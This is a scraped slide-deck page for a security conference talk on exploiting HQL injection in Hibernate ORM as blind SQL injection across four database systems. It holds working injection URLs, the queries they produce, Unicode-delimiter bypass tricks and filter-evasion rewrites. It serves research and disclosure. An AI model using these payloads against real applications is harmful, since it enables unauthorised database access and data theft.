ORM2Pwn: Exploiting injections in Hibernate ORM

Mikhail Egorov
Mikhail EgorovSecurity Researcher & Bug Hunter at Acronis
ORM2Pwn: Exploiting injections in Hibernate ORM Mikhail Egorov Sergey Soldatov
Short BIO - Mikhail Egorov ▶ Application Security Engineer at Odin [ http://www.odin.com ] ▶ Security researcher and bug hunter ▶ Graduated from BMSTU with MSc. in Information Security [IU8] ▶ Holds OSCP and CISSP certificates ▶ See my blog [ http://0ang3el.blogspot.com ]
Short BIO - Sergey Soldatov ▶ Chief infosecurity manager at big corp.’s IT insourcer • GRC  and “paper security” • Security engineer and systems architect • Security operations manager and analyst ▶ Amateur hacker security researcher & musician ▶ BMSTU’s IU8 ▶ CISA, CISSP ▶ http://reply-to-all.blogspot.ru/
Motivation ▶ Modern applications work with DBMS not directly but via ORM ▶ In Java, Hibernate is a popular ORM [ Red Hat project ] ▶ Hibernate uses HQL, which is very limited [ versus SQL ] ▶ HQLi exploitation is limited 
Motivation ▶ Is it possible to exploit HQLi as SQLi for popular DBMSs? ▶ MySQL, Postgresql, Oracle, MS SQL Server are popular [ in our opinion  ] Picture from http://blog.h3xstream.com/2014/02/hql-for-pentesters.html
Chuck Norris can exploit SQLi even on static HTML pages
MySQL DBMS ▶ Hibernate escapes [‘] in string with [‘’] ▶ MySQL escapes [‘] in string with [’] ▶ Kudos to @_unread_ who disclosed this technique before our talk  • http://www.synacktiv.fr/ressources/hql2sql_sstic_2015_en.pdf
MySQL DBMS  What about string ‘abc’’or 1=(select 1)--’?  Hibernate – ‘abc’’or 1=(select 1)--’ [thinks it’s a string]  MySQL – ‘abc’’or 1=(select 1)--’
MySQL DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%27%20or%201<length((select%20vers ion()))%20--%20  HQL query - SELECT p FROM pl.btbw.persistent.Post p where p.name=‘dummy’’ or 1<length((select version())) -- ’  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name=‘dummy’’ or 1<length((select version())) -- ’
Postgresql DBMS  Trick with ’’ not working • Quote escaping with ‘’ only [not with ’]  HQL allows subqueries in where clause  Hibernate allow arbitrary function names in HQL  Postgresql has nice built-in query_to_xml(‘SQL’)
Postgresql DBMS  query_to_xml(‘SQL’) return XML [not usable directly ]  Nevertheless it is possible to know if the SQL return 0 rows or > 0 array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1) array_upper(xpath('row',query_to_xml('select 1 where 1337<1', true, false,'')),1)
Postgresql DBMS SQL returns 1 row [ or more ] SQL returns no rows
Postgresql DBMS  Navigate to URL http://127.0.0.1:8080/hqli.playground/dummy%27%20and%20array_upper%28xpath%28%27row%27%2Cqu ery_to_xml%28%27select%201%20where%201337%3E1%27%2Ctrue%2Cfalse%2C%27%27%29%29%2C1%29%3D1%2 0and%20%271%27%3D%271  HQL query SELECT p FROM hqli.persistent.Post p where p.name='dummy' and array_upper(xpath('row',query_to_xml('select 1 where 1337>1',true,false,'')),1)=1 and '1'='1‘  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' and array_upper(xpath('row', query_to_xml('select 1 where 1337>1', true, false, '')), 1)=1 and '1'='1'
Oracle DBMS  Trick with ’’ not working • Quote escaping with ‘’ [ not with ’ ]  Hibernate allow arbitrary function names in HQL  Oracle has nice built-in DBMS_XMLGEN.getxml(‘SQL’)
Oracle DBMS  DBMS_XMLGEN.getxml(‘SQL’) returns CLOB or null [ null if SQL returns no rows ]  It is possible to know if the SQL return 0 rows or > 0 using TO_CHAR and NVL built-ins NVL(TO_CHAR(DBMS_XMLGEN.getxml(‘SQL')),'1')!='1'
Oracle DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%20and%20NVL(TO_CHAR(DBMS_XMLGEN.getxml(%27SELECT%201337% 20FROM%20dual%20where%201337>1%27)),%271%27)!=%271%27%20and%20%271%27=%271  HQL query SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' and NVL(TO_CHAR(DBMS_XMLGEN.getxml('SELECT 1337 FROM dual where 1337>1')),'1')!='1' and '1'='1‘  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' and NVL(to_char(DBMS_XMLGEN.getxml('SELECT 1337 FROM dual where 1337>1')), '1')<>'1' and '1'='1'
Microsoft SQL Server DBMS  Trick with ’’ not working • Quote escaping with ‘’ only [not with ’]  There are no usable functions like query_to_xml(‘SQL’)
Microsoft SQL Server DBMS  Hibernate ORM allows Unicode symbols in identifiers!!! ANTLR grammar for HQL parsing is here https://github.com/hibernate/hibernate-orm/blob/1ed895a3737c211e8c895b0297f801daccfe85a9/hibernate-core/src/main/antlr/hql.g ANTLR (ANother Tool for Language Recognition) - http://www.antlr.org/
Microsoft SQL Server DBMS  Hibernate ORM allows Unicode symbols in identifiers!!! IDENT options { testLiterals=true; } : ID_START_LETTER ( ID_LETTER )* { // Setting this flag allows the grammar to use keywords as identifiers, if necessary. setPossibleID(true); } ; protected ID_START_LETTER : '_' | '$' | 'a'..'z' | 'u0080'..'ufffe' // HHH-558 : Allow unicode chars in identifiers ; protected ID_LETTER : ID_START_LETTER | '0'..'9' ;
Microsoft SQL Server DBMS  MS SQL Server allows Unicode delimiters in query!!! There are many delimiters like space [U+0020] LEN(U(selectU(1)) [ U – Unicode delimiter ]  We’ve found them all with dumb Fuzzing!!!
Microsoft SQL Server DBMS  Here are the magic delimiters [U] U+00A0 %C2%A0 No-break space U+1680 %E1%9A%80 OGHAM SPACE MARK U+2000 %E2%80%80 EN QUAD U+2001 %E2%80%81 EM QUAD U+2002 %E2%80%82 EN SPACE U+2003 %E2%80%83 EM SPACE U+2004 %E2%80%84 THREE-PER-EM SPACE U+2005 %E2%80%85 FOUR-PER-EM SPACE U+2006 %E2%80%86 SIX-PER-EM SPACE U+2007 %E2%80%87 FIGURE SPACE U+2008 %E2%80%88 PUNCTUATION SPACE U+2009 %E2%80%89 Thin space
Microsoft SQL Server DBMS  Here are the magic delimiters [U] U+200A %E2%80%8A HAIR SPACE U+200B %E2%80%8B ZERO WIDTH SPACE U+2028 %E2%80%A8 LINE SEPARATOR U+2029 %E2%80%A9 PARAGRAPH SEPARATOR U+202F %E2%80%AF NARROW NO-BREAK SPACE U+205F %E2%81%9F Medium Mathematical space U+3000 %E3%80%80 Ideographic space
Microsoft SQL Server DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%20or%201%3CLEN%28%C2%A0%28select%C2%A0top%C2%A01%C2%A0una me%C2%A0from%C2%A0postusers%29%29%20or%20%2731%27=%27143999  HQL query SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' or 1<LEN([U+00A0]( select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999' Hibernate sees here two function calls: Len and [U+00A0] Identifier select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers is passed as function argument  Resulting SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999'
Microsoft SQL Server DBMS select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999‘ Is the same as select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len(select top 1 uname from postusers)) or '31'='143999'
Microsoft SQL Server DBMS: additional useful tricks Query fragment How to rewrite to full HQL Result where id=13 where id like 13 No “=“ where field=‘data’ where field like cast(0xDATA_IN_HEX as varchar) No “=“; No “ ’ “ where field not in (‘data1’, ‘data2’) where 0 like charindex(concat(‘+’,field,’+’), cast(0xDATA1DATA2_IN_HEX as varchar(MAX))) No list 0xDATA_IN_HEX smth_known_to_hibernate(..) U0xDATA_IN_HEX Usmth_known_to_hibernate(..) int || func  identifier substring((select…),N,1)=‘c’ N like charindex(‘c’, (select…), N) substring  charindex
Hey, dude stop it! Show me the hack! Video - https://www.youtube.com/watch?v=m_MTWZptXUw All demo scripts are here - https://github.com/0ang3el/Hibernate-Injection-Study Vulnerable App - https://github.com/0ang3el/HQLi-playground
Takeaways ▶ HQL injection is SQL injection [ exploit HQLi as bSQLi ] ▶ Hibernate is not a WAF ▶ Our exploitation technique works because: ▶ Hibernate allows arbitrary names for identifiers (function and argument names) ▶ Hibernate allows Unicode symbols in identifiers ▶ Hibernate escapes quotes [‘] in string by doubling them [‘’]
Questions?
1 of 28

ORM2Pwn: Exploiting injections in Hibernate ORM

Download to read offline
Software

Presented on Zeronights 0x05 security confernce.

Mikhail Egorov
Mikhail EgorovSecurity Researcher & Bug Hunter at Acronis

Recommended

ORM Injection by
ORM InjectionORM Injection
ORM InjectionSimone Onofri
11.2K views38 slides
A Hacker's perspective on AEM applications security by
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
1.3K views49 slides
New methods for exploiting ORM injections in Java applications by
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsMikhail Egorov
12.1K views82 slides
What should a hacker know about WebDav? by
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
8.5K views18 slides
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs by
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
14.2K views124 slides
HTTP Request Smuggling via higher HTTP versions by
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
9.5K views41 slides

More Related Content

What's hot

Hacking Adobe Experience Manager sites by
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
13.2K views23 slides
Building Advanced XSS Vectors by
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
7.8K views61 slides
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015 by
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
6.5K views84 slides
Neat tricks to bypass CSRF-protection by
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
17.6K views38 slides
Ekoparty 2017 - The Bug Hunter's Methodology by
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
7.9K views58 slides
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs. by
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
6.1K views59 slides

What's hot(20)

Hacking Adobe Experience Manager sites by Mikhail Egorov
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov13.2K views
Building Advanced XSS Vectors by Rodolfo Assis (Brute)
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)7.8K views
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015 by CODE BLUE
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE6.5K views
Neat tricks to bypass CSRF-protection by Mikhail Egorov
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov17.6K views
Ekoparty 2017 - The Bug Hunter's Methodology by bugcrowd
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd7.9K views
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs. by Mikhail Egorov
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
Mikhail Egorov6.1K views
A Brief Introduction in SQL Injection by Sina Manavi
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
Sina Manavi6K views
Attacking thru HTTP Host header by Sergey Belov
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov1.8K views
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies by Frans Rosén
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Frans Rosén16.4K views
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour by Soroush Dalili
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili52.9K views
XSS Magic tricks by GarethHeyes
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes13.7K views
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter by Masato Kinugawa
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa38.8K views
Waf bypassing Techniques by Avinash Thapa
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa26.4K views
slingmodels by Ankur Chauhan
slingmodelsslingmodels
slingmodels
Ankur Chauhan339 views
CSRF, ClickJacking & Open Redirect by Blueinfy Solutions
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions5.5K views
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps by hacktivity
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
hacktivity733 views
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition by Soroush Dalili
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Soroush Dalili1.3K views
SQL Injection: complete walkthrough (not only) for PHP developers by Krzysztof Kotowicz
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
Krzysztof Kotowicz17.9K views
Reverse proxies & Inconsistency by GreenD0g
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
GreenD0g4.8K views
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,... by Mario Heiderich
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich45.4K views

Similar to ORM2Pwn: Exploiting injections in Hibernate ORM

Playing With (B)Sqli by
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
1.8K views54 slides
Applying profilers to my sql (fosdem 2017) by
Applying profilers to my sql (fosdem 2017)Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)Valeriy Kravchuk
852 views23 slides
HandlerSocket plugin for MySQL (English) by
HandlerSocket plugin for MySQL (English)HandlerSocket plugin for MySQL (English)
HandlerSocket plugin for MySQL (English)akirahiguchi
9.5K views51 slides
APEX Connect 2019 - array/bulk processing in PLSQL by
APEX Connect 2019 - array/bulk processing in PLSQLAPEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLConnor McDonald
195 views155 slides
PL/SQL User-Defined Functions in the Read World by
PL/SQL User-Defined Functions in the Read WorldPL/SQL User-Defined Functions in the Read World
PL/SQL User-Defined Functions in the Read WorldMichael Rosenblum
1.1K views60 slides
A MySQL Odyssey - A Blackhole Crossover by
A MySQL Odyssey - A Blackhole CrossoverA MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverKeith Hollman
919 views24 slides

Similar to ORM2Pwn: Exploiting injections in Hibernate ORM(20)

Playing With (B)Sqli by Chema Alonso
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
Chema Alonso1.8K views
Applying profilers to my sql (fosdem 2017) by Valeriy Kravchuk
Applying profilers to my sql (fosdem 2017)Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)
Valeriy Kravchuk852 views
HandlerSocket plugin for MySQL (English) by akirahiguchi
HandlerSocket plugin for MySQL (English)HandlerSocket plugin for MySQL (English)
HandlerSocket plugin for MySQL (English)
akirahiguchi9.5K views
APEX Connect 2019 - array/bulk processing in PLSQL by Connor McDonald
APEX Connect 2019 - array/bulk processing in PLSQLAPEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQL
Connor McDonald195 views
PL/SQL User-Defined Functions in the Read World by Michael Rosenblum
PL/SQL User-Defined Functions in the Read WorldPL/SQL User-Defined Functions in the Read World
PL/SQL User-Defined Functions in the Read World
Michael Rosenblum1.1K views
A MySQL Odyssey - A Blackhole Crossover by Keith Hollman
A MySQL Odyssey - A Blackhole CrossoverA MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole Crossover
Keith Hollman919 views
Feb14 successful development by Connor McDonald
Feb14 successful developmentFeb14 successful development
Feb14 successful development
Connor McDonald950 views
ShmooCon 2009 - (Re)Playing(Blind)Sql by Chema Alonso
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
Chema Alonso1.5K views
MoSQL: More than SQL, but less than ORM by Mosky Liu
MoSQL: More than SQL, but less than ORMMoSQL: More than SQL, but less than ORM
MoSQL: More than SQL, but less than ORM
Mosky Liu1.5K views
Performance tuning a quick intoduction by Riyaj Shamsudeen
Performance tuning a quick intoductionPerformance tuning a quick intoduction
Performance tuning a quick intoduction
Riyaj Shamsudeen2.2K views
Asegúr@IT IV - Remote File Downloading by Chema Alonso
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
Chema Alonso1.4K views
Sql injection by Nikunj Dhameliya
Sql injectionSql injection
Sql injection
Nikunj Dhameliya2.6K views
SQL Macros - Game Changing Feature for SQL Developers? by Andrej Pashchenko
SQL Macros - Game Changing Feature for SQL Developers?SQL Macros - Game Changing Feature for SQL Developers?
SQL Macros - Game Changing Feature for SQL Developers?
Andrej Pashchenko319 views
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto by Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto17.9K views
Awr doag by Marcin Przepiórowski
Awr doagAwr doag
Awr doag
Marcin Przepiórowski771 views
Ash and awr deep dive hotsos by Kellyn Pot'Vin-Gorman
Ash and awr deep dive hotsosAsh and awr deep dive hotsos
Ash and awr deep dive hotsos
Kellyn Pot'Vin-Gorman2.9K views
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm by guest785f78
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
guest785f781.2K views
ShmooCON 2009 : Re-playing with (Blind) SQL Injection by Chema Alonso
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
Chema Alonso2.3K views
Beg sql by Karthik Perumal
Beg sqlBeg sql
Beg sql
Karthik Perumal655 views
Beg sql by KPNR Jan
Beg sqlBeg sql
Beg sql
KPNR Jan363 views

Recently uploaded

Airline Booking Software by
Airline Booking SoftwareAirline Booking Software
Airline Booking SoftwareSharmiMehta
7 views26 slides
HarshithAkkapelli_Presentation.pdf by
HarshithAkkapelli_Presentation.pdfHarshithAkkapelli_Presentation.pdf
HarshithAkkapelli_Presentation.pdfharshithakkapelli
12 views16 slides
Flask-Python.pptx by
Flask-Python.pptxFlask-Python.pptx
Flask-Python.pptxTriloki Gupta
7 views12 slides
predicting-m3-devopsconMunich-2023.pptx by
predicting-m3-devopsconMunich-2023.pptxpredicting-m3-devopsconMunich-2023.pptx
predicting-m3-devopsconMunich-2023.pptxTier1 app
7 views24 slides
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra... by
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra....NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...Marc Müller
41 views62 slides
Fleet Management Software in India by
Fleet Management Software in India Fleet Management Software in India
Fleet Management Software in India Fleetable
12 views1 slide

Recently uploaded(20)

Airline Booking Software by SharmiMehta
Airline Booking SoftwareAirline Booking Software
Airline Booking Software
SharmiMehta7 views
HarshithAkkapelli_Presentation.pdf by harshithakkapelli
HarshithAkkapelli_Presentation.pdfHarshithAkkapelli_Presentation.pdf
HarshithAkkapelli_Presentation.pdf
harshithakkapelli12 views
Flask-Python.pptx by Triloki Gupta
Flask-Python.pptxFlask-Python.pptx
Flask-Python.pptx
Triloki Gupta7 views
predicting-m3-devopsconMunich-2023.pptx by Tier1 app
predicting-m3-devopsconMunich-2023.pptxpredicting-m3-devopsconMunich-2023.pptx
predicting-m3-devopsconMunich-2023.pptx
Tier1 app7 views
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra... by Marc Müller
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra....NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...
Marc Müller41 views
Fleet Management Software in India by Fleetable
Fleet Management Software in India Fleet Management Software in India
Fleet Management Software in India
Fleetable12 views
Myths and Facts About Hospice Care: Busting Common Misconceptions by Care Coordinations
Myths and Facts About Hospice Care: Busting Common MisconceptionsMyths and Facts About Hospice Care: Busting Common Misconceptions
Myths and Facts About Hospice Care: Busting Common Misconceptions
Care Coordinations7 views
The Era of Large Language Models.pptx by AbdulVahedShaik
The Era of Large Language Models.pptxThe Era of Large Language Models.pptx
The Era of Large Language Models.pptx
AbdulVahedShaik7 views
Introduction to Maven by John Valentino
Introduction to MavenIntroduction to Maven
Introduction to Maven
John Valentino6 views
Introduction to Git Source Control by John Valentino
Introduction to Git Source ControlIntroduction to Git Source Control
Introduction to Git Source Control
John Valentino6 views
Unlocking the Power of AI in Product Management - A Comprehensive Guide for P... by NimaTorabi2
Unlocking the Power of AI in Product Management - A Comprehensive Guide for P...Unlocking the Power of AI in Product Management - A Comprehensive Guide for P...
Unlocking the Power of AI in Product Management - A Comprehensive Guide for P...
NimaTorabi215 views
FIMA 2023 Neo4j & FS - Entity Resolution.pptx by Neo4j
FIMA 2023 Neo4j & FS - Entity Resolution.pptxFIMA 2023 Neo4j & FS - Entity Resolution.pptx
FIMA 2023 Neo4j & FS - Entity Resolution.pptx
Neo4j17 views
20231129 - Platform @ localhost 2023 - Application-driven infrastructure with... by sparkfabrik
20231129 - Platform @ localhost 2023 - Application-driven infrastructure with...20231129 - Platform @ localhost 2023 - Application-driven infrastructure with...
20231129 - Platform @ localhost 2023 - Application-driven infrastructure with...
sparkfabrik8 views
How Workforce Management Software Empowers SMEs | TraQSuite by TraQSuite
How Workforce Management Software Empowers SMEs | TraQSuiteHow Workforce Management Software Empowers SMEs | TraQSuite
How Workforce Management Software Empowers SMEs | TraQSuite
TraQSuite5 views
Sprint 226 by ManageIQ
Sprint 226Sprint 226
Sprint 226
ManageIQ10 views
Quality Engineer: A Day in the Life by John Valentino
Quality Engineer: A Day in the LifeQuality Engineer: A Day in the Life
Quality Engineer: A Day in the Life
John Valentino7 views
Page Object Model by artembondar5
Page Object ModelPage Object Model
Page Object Model
artembondar56 views
Dev-HRE-Ops - Addressing the _Last Mile DevOps Challenge_ in Highly Regulated... by TomHalpin9
Dev-HRE-Ops - Addressing the _Last Mile DevOps Challenge_ in Highly Regulated...Dev-HRE-Ops - Addressing the _Last Mile DevOps Challenge_ in Highly Regulated...
Dev-HRE-Ops - Addressing the _Last Mile DevOps Challenge_ in Highly Regulated...
TomHalpin96 views
JioEngage_Presentation.pptx by admin125455
JioEngage_Presentation.pptxJioEngage_Presentation.pptx
JioEngage_Presentation.pptx
admin1254556 views
What is API by artembondar5
What is APIWhat is API
What is API
artembondar510 views

ORM2Pwn: Exploiting injections in Hibernate ORM

  • 1. ORM2Pwn: Exploiting injections in Hibernate ORM Mikhail Egorov Sergey Soldatov
  • 2. Short BIO - Mikhail Egorov ▶ Application Security Engineer at Odin [ http://www.odin.com ] ▶ Security researcher and bug hunter ▶ Graduated from BMSTU with MSc. in Information Security [IU8] ▶ Holds OSCP and CISSP certificates ▶ See my blog [ http://0ang3el.blogspot.com ]
  • 3. Short BIO - Sergey Soldatov ▶ Chief infosecurity manager at big corp.’s IT insourcer • GRC  and “paper security” • Security engineer and systems architect • Security operations manager and analyst ▶ Amateur hacker security researcher & musician ▶ BMSTU’s IU8 ▶ CISA, CISSP ▶ http://reply-to-all.blogspot.ru/
  • 4. Motivation ▶ Modern applications work with DBMS not directly but via ORM ▶ In Java, Hibernate is a popular ORM [ Red Hat project ] ▶ Hibernate uses HQL, which is very limited [ versus SQL ] ▶ HQLi exploitation is limited 
  • 5. Motivation ▶ Is it possible to exploit HQLi as SQLi for popular DBMSs? ▶ MySQL, Postgresql, Oracle, MS SQL Server are popular [ in our opinion  ] Picture from http://blog.h3xstream.com/2014/02/hql-for-pentesters.html
  • 6. Chuck Norris can exploit SQLi even on static HTML pages
  • 7. MySQL DBMS ▶ Hibernate escapes [‘] in string with [‘’] ▶ MySQL escapes [‘] in string with [’] ▶ Kudos to @_unread_ who disclosed this technique before our talk  • http://www.synacktiv.fr/ressources/hql2sql_sstic_2015_en.pdf
  • 8. MySQL DBMS  What about string ‘abc’’or 1=(select 1)--’?  Hibernate – ‘abc’’or 1=(select 1)--’ [thinks it’s a string]  MySQL – ‘abc’’or 1=(select 1)--’
  • 9. MySQL DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%27%20or%201<length((select%20vers ion()))%20--%20  HQL query - SELECT p FROM pl.btbw.persistent.Post p where p.name=‘dummy’’ or 1<length((select version())) -- ’  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name=‘dummy’’ or 1<length((select version())) -- ’
  • 10. Postgresql DBMS  Trick with ’’ not working • Quote escaping with ‘’ only [not with ’]  HQL allows subqueries in where clause  Hibernate allow arbitrary function names in HQL  Postgresql has nice built-in query_to_xml(‘SQL’)
  • 11. Postgresql DBMS  query_to_xml(‘SQL’) return XML [not usable directly ]  Nevertheless it is possible to know if the SQL return 0 rows or > 0 array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1) array_upper(xpath('row',query_to_xml('select 1 where 1337<1', true, false,'')),1)
  • 12. Postgresql DBMS SQL returns 1 row [ or more ] SQL returns no rows
  • 13. Postgresql DBMS  Navigate to URL http://127.0.0.1:8080/hqli.playground/dummy%27%20and%20array_upper%28xpath%28%27row%27%2Cqu ery_to_xml%28%27select%201%20where%201337%3E1%27%2Ctrue%2Cfalse%2C%27%27%29%29%2C1%29%3D1%2 0and%20%271%27%3D%271  HQL query SELECT p FROM hqli.persistent.Post p where p.name='dummy' and array_upper(xpath('row',query_to_xml('select 1 where 1337>1',true,false,'')),1)=1 and '1'='1‘  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' and array_upper(xpath('row', query_to_xml('select 1 where 1337>1', true, false, '')), 1)=1 and '1'='1'
  • 14. Oracle DBMS  Trick with ’’ not working • Quote escaping with ‘’ [ not with ’ ]  Hibernate allow arbitrary function names in HQL  Oracle has nice built-in DBMS_XMLGEN.getxml(‘SQL’)
